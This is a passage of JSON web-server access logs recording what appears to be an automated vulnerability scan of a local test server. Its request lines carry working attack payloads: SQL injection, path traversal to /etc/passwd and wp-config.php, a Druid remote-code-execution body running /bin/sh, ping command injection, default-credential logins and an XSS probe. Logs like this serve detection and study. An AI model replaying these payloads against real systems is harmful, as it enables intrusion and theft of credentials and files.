/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /elmah.axd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.413","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /monitorix-cgi/monitorix.cgi?mode=localhost&graph=all&when=1day HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.371","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_/.ssh/authorized_keys HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.995","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.499","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graph HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.420","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /proftpd.conf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.425","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.483","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"userName=admin&userPassword=dolphinscheduler123","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /dolphinscheduler/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.420","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.426","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /get_dkey.php?user=admin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.465","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.459","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"{\x0D\x0A\x22type\x22:\x22index\x22,\x0D\x0A\x22spec\x22:{\x0D\x0A \x22ioConfig\x22:{\x0D\x0A \x22type\x22:\x22index\x22,\x0D\x0A \x22firehose\x22:{\x0D\x0A \x22type\x22:\x22local\x22,\x0D\x0A \x22baseDir\x22:\x22/etc\x22,\x0D\x0A \x22filter\x22:\x22passwd\x22\x0D\x0A }\x0D\x0A },\x0D\x0A \x22dataSchema\x22:{\x0D\x0A \x22dataSource\x22:\x22odgjxrrrePz\x22,\x0D\x0A \x22parser\x22:{\x0D\x0A \x22parseSpec\x22:{\x0D\x0A \x22format\x22:\x22javascript\x22,\x0D\x0A \x22timestampSpec\x22:{\x0D\x0A\x0D\x0A },\x0D\x0A \x22dimensionsSpec\x22:{\x0D\x0A\x0D\x0A },\x0D\x0A \x22function\x22:\x22function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\x5C\x22/bin/sh`@~-c`@~cat /etc/passwd\x5C\x22.split(\x5C\x22`@~\x5C\x22)).getInputStream()).useDelimiter(\x5C\x22\x5C\x5CA\x5C\x22).next();return {timestamp:\x5C\x224137368\x5C\x22,OQtGXcxBVQVL: hTVCCerYZ}}\x22,\x0D\x0A \x22\x22:{\x0D\x0A \x22enabled\x22:\x22true\x22\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A},\x0D\x0A\x22samplerConfig\x22:{\x0D\x0A \x22numRows\x22:10\x0D\x0A}\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /druid/indexer/v1/sampler HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.425","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'28fHqNIaxCwfxE6v2zgindvZxzQ'); INSERT INTO extra_field_options(option_value) VALUES ('28fHqNIaxCwfxE6v2zgindvZxzQ'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '28fHqNIaxCwfxE6v2zgindvZxzQ', 16,0) ON DUPLICATE KEY UPDATE tag='28fHqNIaxCwfxE6v2zgindvZxzQ', field_id=16, count=0; -- \x22]","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.346","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mt/admin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.455","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+} HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.390","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"_charset_=utf-8&j_username=vgnadmin&j_password=vgnadmin&j_validate=true","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.947","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\x22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.460","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /radiusmanager/user.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.440","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.457","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graph_cms HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /contrib/acog/print_form.php?formname=../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.426","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.944","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /auth/login/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.347","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sap/public/info HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.359","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/backup-db/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\x22;user|s.\x221337\x22; HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.443","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"_charset_=utf-8&j_username=author&j_password=author&j_validate=true","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.304","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webclient/Login.xhtml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.319","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.502","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test') or 1=1 -- \x22]","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.420","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /user.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.377","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphiql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"var={\x22body\x22:{\x22file\x22:\x22file:///etc/passwd\x22}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.449","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ui/login.php?user=admin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.400","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /user/0 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.402","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pme/database/pme/phinx.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.423","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"_charset_=utf-8&j_username=anonymous&j_password=anonymous&j_validate=true","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.425","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.403","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.428","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphiql.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /graphql?query={__typename} HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.380","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.303","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.353","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", 